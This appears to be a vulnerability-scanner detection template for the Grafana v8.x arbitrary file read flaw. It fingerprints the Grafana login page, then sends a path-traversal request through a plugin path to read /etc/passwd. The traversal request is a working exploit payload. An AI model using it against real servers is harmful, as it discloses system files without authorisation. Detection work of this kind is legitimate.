漏洞描述
app="Grafana_Labs-公司产品"
id: grafana-file-read
info:
name: Grafana v8.x Arbitrary File Read
author: zan8in
severity: high
description: |
app="Grafana_Labs-公司产品"
rules:
r0:
request:
method: GET
path: /login
expression: response.status == 200 && response.body.bcontains(b'<title>Grafana</title>')
r1:
request:
method: GET
path: /public/plugins/welcome/../../../../../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()